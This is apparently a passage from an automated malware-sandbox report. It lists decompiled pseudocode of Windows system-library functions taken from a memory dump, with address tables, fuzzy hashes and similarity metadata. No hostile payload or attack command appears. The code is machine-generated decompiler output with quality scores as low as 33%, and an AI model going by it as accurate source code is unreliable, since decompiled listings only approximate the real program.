                                                                  0x049b35ca
                                                                  0x049b35d7
                                                                  0x049b35e2
                                                                  0x049b35e6
                                                                  0x049b35e8
                                                                  0x049b35f5
                                                                  0x049b35fa
                                                                  0x049b3603
                                                                  0x049b3604
                                                                  0x049b3609
                                                                  0x049b360a
                                                                  0x049b3612
                                                                  0x049b3613
                                                                  0x049b361e
                                                                  0x049b3622
                                                                  0x049b3628
                                                                  0x049b362f
                                                                  0x049b362f
                                                                  0x049b3636
                                                                  0x049b3638
                                                                  0x049b363b
                                                                  0x049b3642
                                                                  0x049b3642
                                                                  0x049b3636
                                                                  0x049b3657
                                                                  0x049b3657
                                                                  0x049b365c
                                                                  0x049b3662
                                                                  0x049b3669
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: BinaryHash
                                                                  • API String ID: 2994545307-2202222882
                                                                  • Opcode ID: e30f398cb18f28d0618192b821760de10a9b6d9d2992c07269f80e795c5aaa71
                                                                  • Instruction ID: 372e8fc74183021520417d943fbdcc5243d030b1656b4cfd789e81fc42131a0c
                                                                  • Opcode Fuzzy Hash: e30f398cb18f28d0618192b821760de10a9b6d9d2992c07269f80e795c5aaa71
                                                                  • Instruction Fuzzy Hash: E74104B1D0152C9FEB21DA50CD85FDEB77CAB44718F0045B5EA49A7240DB30AE888FD5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04A005AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 71%
                                                                  			E04A005AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E04A007DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04979730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E049FA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E049FA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E04A01293(_t79, _v40, E04A007DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E04957D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E049F138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                  0x04a005c5
                                                                  0x04a005ca
                                                                  0x04a005d3
                                                                  0x04a006db
                                                                  0x04a006db
                                                                  0x04a006dd
                                                                  0x04a006e3
                                                                  0x04a006e3
                                                                  0x04a005dd
                                                                  0x04a005e7
                                                                  0x04a005f6
                                                                  0x04a00600
                                                                  0x04a00607
                                                                  0x04a00610
                                                                  0x04a00615
                                                                  0x04a0061a
                                                                  0x04a0061c
                                                                  0x04a0061e
                                                                  0x04a00624
                                                                  0x04a00625
                                                                  0x04a00627
                                                                  0x04a00628
                                                                  0x04a00631
                                                                  0x04a00640
                                                                  0x04a0064d
                                                                  0x04a00654
                                                                  0x04a00654
                                                                  0x04a00631
                                                                  0x04a0066d
                                                                  0x04a00674
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04a00692
                                                                  0x04a0069e
                                                                  0x04a006b0
                                                                  0x04a006a0
                                                                  0x04a006a9
                                                                  0x04a006a9
                                                                  0x04a006b8
                                                                  0x04a006d6
                                                                  0x04a006d6
                                                                  0x00000000

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `
                                                                  • API String ID: 0-2679148245
                                                                  • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                  • Instruction ID: f43a4a42df7855640c352d5dd392dd1164abc264b6c452b02cab5d67525eec08
                                                                  • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                  • Instruction Fuzzy Hash: 6731E2326087456BE720DF24ED45F9777EAABC4758F048229FA59AB2C0E7B0F904C791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0496A61C, Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 78%
                                                                  			E0496A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4a10220);
				E0498D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x4a27b9c; // 0x0
				_t55 = L04954620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0498D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x4a27b10 =  *0x4a27b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x4a2536c; // 0x29ae50
					if( *_t51 != 0x4a25368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x4a25368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x4a2536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0496A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                  0x0496a61c
                                                                  0x0496a61e
                                                                  0x0496a623
                                                                  0x0496a628
                                                                  0x0496a62b
                                                                  0x0496a62d
                                                                  0x0496a648
                                                                  0x0496a64a
                                                                  0x0496a64f
                                                                  0x049a9b44
                                                                  0x0496a6ec
                                                                  0x0496a6f1
                                                                  0x0496a6f1
                                                                  0x0496a655
                                                                  0x0496a657
                                                                  0x0496a65a
                                                                  0x0496a65d
                                                                  0x0496a662
                                                                  0x0496a663
                                                                  0x0496a667
                                                                  0x0496a668
                                                                  0x0496a66d
                                                                  0x0496a706
                                                                  0x0496a706
                                                                  0x049a9bda
                                                                  0x049a9be6
                                                                  0x049a9beb
                                                                  0x00000000
                                                                  0x049a9beb
                                                                  0x0496a679
                                                                  0x049a9b7a
                                                                  0x00000000
                                                                  0x049a9b7a
                                                                  0x0496a683
                                                                  0x0496a6f4
                                                                  0x0496a6f7
                                                                  0x0496a6f9
                                                                  0x0496a6fd
                                                                  0x0496a6a0
                                                                  0x0496a6a0
                                                                  0x0496a6ad
                                                                  0x0496a6af
                                                                  0x0496a6b4
                                                                  0x049a9ba7
                                                                  0x049a9bac
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a9bc6
                                                                  0x049a9bce
                                                                  0x049a9bd1
                                                                  0x049a9bd3
                                                                  0x049a9bd3
                                                                  0x00000000
                                                                  0x049a9bd1
                                                                  0x0496a6bd
                                                                  0x0496a6c3
                                                                  0x0496a6c6
                                                                  0x0496a6d2
                                                                  0x0496a701
                                                                  0x0496a704
                                                                  0x00000000
                                                                  0x0496a704
                                                                  0x0496a6d4
                                                                  0x0496a6d6
                                                                  0x0496a6d9
                                                                  0x0496a6db
                                                                  0x0496a6e1
                                                                  0x0496a6e6
                                                                  0x0496a6e8
                                                                  0x0496a6e8
                                                                  0x0496a6ea
                                                                  0x00000000
                                                                  0x0496a6ea
                                                                  0x0496a688
                                                                  0x0496a692
                                                                  0x0496a694
                                                                  0x0496a699
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496a69d
                                                                  0x00000000

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8@)
                                                                  • API String ID: 0-1743960659
                                                                  • Opcode ID: b3d0aff5162590181ffc37561d4d961dd9c7443d3074ad028b2f51acd1afbe77
                                                                  • Instruction ID: 11de185a25cad1f2a0121c5ef28dbaa19507de766a0c19a9cb58fda4ec21a5ab
                                                                  • Opcode Fuzzy Hash: b3d0aff5162590181ffc37561d4d961dd9c7443d3074ad028b2f51acd1afbe77
                                                                  • Instruction Fuzzy Hash: 62416AB5A00209DFDB14CF58C590BA9BBF2FF89304F1485A9E806AB344D775B941DF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049B3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 72%
                                                                  			E049B3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04979650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04954620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04979650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                  0x049b3893
                                                                  0x049b3896
                                                                  0x049b3899
                                                                  0x049b389f
                                                                  0x049b38a0
                                                                  0x049b38a4
                                                                  0x049b38a9
                                                                  0x049b38ac
                                                                  0x049b38ad
                                                                  0x049b38ae
                                                                  0x049b38af
                                                                  0x049b38b1
                                                                  0x049b38b4
                                                                  0x049b38bb
                                                                  0x049b38bc
                                                                  0x049b38bd
                                                                  0x049b38c4
                                                                  0x049b38c8
                                                                  0x049b38ca
                                                                  0x049b38ca
                                                                  0x049b38d5
                                                                  0x049b393e
                                                                  0x049b3940
                                                                  0x049b3942
                                                                  0x049b3952
                                                                  0x049b3954
                                                                  0x049b3961
                                                                  0x049b3961
                                                                  0x049b3967
                                                                  0x049b396e
                                                                  0x049b396e
                                                                  0x049b3947
                                                                  0x049b394c
                                                                  0x00000000
                                                                  0x049b394c
                                                                  0x049b38ea
                                                                  0x049b38ee
                                                                  0x049b38f8
                                                                  0x049b38f9
                                                                  0x049b38ff
                                                                  0x049b3900
                                                                  0x049b3902
                                                                  0x049b3903
                                                                  0x049b390b
                                                                  0x049b390f
                                                                  0x049b3950
                                                                  0x00000000
                                                                  0x049b3950
                                                                  0x049b3915
                                                                  0x049b391d
                                                                  0x049b391d
                                                                  0x049b3922
                                                                  0x049b3926
                                                                  0x00000000
                                                                  0x049b3928
                                                                  0x049b392b
                                                                  0x049b392b
                                                                  0x049b3935
                                                                  0x049b3937
                                                                  0x049b3937
                                                                  0x00000000
                                                                  0x049b3935
                                                                  0x049b3926
                                                                  0x049b38f0
                                                                  0x00000000

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: BinaryName
                                                                  • API String ID: 2994545307-215506332
                                                                  • Opcode ID: 50438c3a543006ac82aff54a2a9edc6196c86ef53f33bf125a4bd61e4c17e680
                                                                  • Instruction ID: c592a85aeea47262001b5934bc34e62f25569a587d7822764fde5079673962d2
                                                                  • Opcode Fuzzy Hash: 50438c3a543006ac82aff54a2a9edc6196c86ef53f33bf125a4bd61e4c17e680
                                                                  • Instruction Fuzzy Hash: DC31F472900609FFEB35DA58CA45EABB778EB80B20F014179AC85A7650D630BE00C7E0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0496D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 33%
                                                                  			E0496D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4a2d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04954120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0497B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E049798D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E049795D0();
					L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                  0x0496d29c
                                                                  0x0496d2a6
                                                                  0x0496d2b1
                                                                  0x0496d2b5
                                                                  0x0496d2b6
                                                                  0x0496d2bc
                                                                  0x0496d2bd
                                                                  0x0496d2be
                                                                  0x0496d2bf
                                                                  0x0496d2c2
                                                                  0x0496d2c4
                                                                  0x0496d2cc
                                                                  0x0496d384
                                                                  0x0496d34b
                                                                  0x0496d34f
                                                                  0x0496d350
                                                                  0x0496d351
                                                                  0x0496d35c
                                                                  0x0496d35c
                                                                  0x0496d2d6
                                                                  0x0496d2da
                                                                  0x0496d2e1
                                                                  0x0496d361
                                                                  0x0496d369
                                                                  0x0496d36d
                                                                  0x0496d2e3
                                                                  0x0496d2e3
                                                                  0x0496d2e3
                                                                  0x0496d2e5
                                                                  0x0496d2ed
                                                                  0x0496d2f5
                                                                  0x0496d2fa
                                                                  0x0496d302
                                                                  0x0496d303
                                                                  0x0496d30b
                                                                  0x0496d30f
                                                                  0x0496d313
                                                                  0x0496d318
                                                                  0x0496d31c
                                                                  0x0496d320
                                                                  0x0496d379
                                                                  0x0496d37d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049aaffe
                                                                  0x049ab001
                                                                  0x049ab011
                                                                  0x00000000
                                                                  0x0496d322
                                                                  0x0496d322
                                                                  0x0496d330
                                                                  0x0496d337
                                                                  0x0496d35d
                                                                  0x0496d339
                                                                  0x0496d33f
                                                                  0x0496d38c
                                                                  0x0496d38c
                                                                  0x0496d33f
                                                                  0x0496d349
                                                                  0x00000000
                                                                  0x0496d349

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 20b384f82732d75b4725df8816b3d3150c82f46e12e8b68ee1b094e82746df08
                                                                  • Instruction ID: b9443c58a3657050f0810ed4b6802105b0289ba476b62b4a45e84c5fc0a9fdb3
                                                                  • Opcode Fuzzy Hash: 20b384f82732d75b4725df8816b3d3150c82f46e12e8b68ee1b094e82746df08
                                                                  • Instruction Fuzzy Hash: C33174B16083059FD711DF2CC980D5BBBE9EBC5658F000A3EF9A583210E638ED04DB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04941B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 72%
                                                                  			E04941B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0497BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0497A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0497A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04954620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                  0x04941b8f
                                                                  0x04941b9a
                                                                  0x04941b9c
                                                                  0x04941b9e
                                                                  0x04941ba3
                                                                  0x04997010
                                                                  0x04997010
                                                                  0x00000000
                                                                  0x04941ba9
                                                                  0x04941ba9
                                                                  0x04941bae
                                                                  0x00000000
                                                                  0x04941bc5
                                                                  0x04941bca
                                                                  0x04941bcf
                                                                  0x04941bd0
                                                                  0x04941bd1
                                                                  0x04941bd2
                                                                  0x04941bd6
                                                                  0x04941bdc
                                                                  0x04941be0
                                                                  0x04996ffc
                                                                  0x04997000
                                                                  0x00000000
                                                                  0x04997006
                                                                  0x04997009
                                                                  0x04997009
                                                                  0x04941be6
                                                                  0x04941bec
                                                                  0x04941c0b
                                                                  0x04941c0b
                                                                  0x04941c0c
                                                                  0x04941c11
                                                                  0x04941c12
                                                                  0x04941c15
                                                                  0x04941c1b
                                                                  0x04941c1f
                                                                  0x04941c31
                                                                  0x04941c33
                                                                  0x04997026
                                                                  0x04997026
                                                                  0x04941c21
                                                                  0x04941c24
                                                                  0x04941c24
                                                                  0x04941bee
                                                                  0x04941bee
                                                                  0x04941bf2
                                                                  0x04941c3a
                                                                  0x04941bf4
                                                                  0x04941bf4
                                                                  0x04941c05
                                                                  0x04941c05
                                                                  0x04941c09
                                                                  0x04941c3e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04941c09
                                                                  0x04941bec
                                                                  0x04941be0
                                                                  0x04941bae
                                                                  0x04941c2e

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: WindowsExcludedProcs
                                                                  • API String ID: 0-3583428290
                                                                  • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                  • Instruction ID: 370615e7660decdddcfcc061b8acfe1a8ba2f79f2d8b1fc5a4d9a4418b02c78c
                                                                  • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                  • Instruction Fuzzy Hash: 7021D036A01228BBDB219ED9CC49F6BB7ADABC1B55F054875AD048B200EA30FD5097A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0495F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0495F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                  0x0495f71d
                                                                  0x0495f722
                                                                  0x0495f726
                                                                  0x049a4770
                                                                  0x0495f765
                                                                  0x0495f769
                                                                  0x0495f769
                                                                  0x0495f732
                                                                  0x049a477a
                                                                  0x00000000
                                                                  0x049a477a
                                                                  0x0495f738
                                                                  0x0495f73a
                                                                  0x0495f73c
                                                                  0x0495f73f
                                                                  0x0495f746
                                                                  0x0495f778
                                                                  0x0495f7a9
                                                                  0x0495f7a9
                                                                  0x0495f754
                                                                  0x0495f75a
                                                                  0x0495f75d
                                                                  0x0495f75f
                                                                  0x0495f761
                                                                  0x0495f76f
                                                                  0x0495f771
                                                                  0x0495f771
                                                                  0x0495f76f
                                                                  0x0495f763
                                                                  0x00000000
                                                                  0x0495f763
                                                                  0x0495f77d
                                                                  0x0495f7a3
                                                                  0x0495f7a5
                                                                  0x00000000
                                                                  0x0495f7a5
                                                                  0x0495f77f
                                                                  0x0495f782
                                                                  0x0495f784
                                                                  0x0495f786
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0495f788
                                                                  0x0495f748
                                                                  0x0495f74d
                                                                  0x0495f78d
                                                                  0x0495f793
                                                                  0x0495f7b7
                                                                  0x0495f7bc
                                                                  0x00000000
                                                                  0x0495f7bc
                                                                  0x0495f798
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0495f79d
                                                                  0x0495f7b0
                                                                  0x00000000
                                                                  0x0495f7b0
                                                                  0x0495f79f
                                                                  0x00000000
                                                                  0x0495f74f
                                                                  0x0495f74f
                                                                  0x00000000
                                                                  0x0495f74f

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
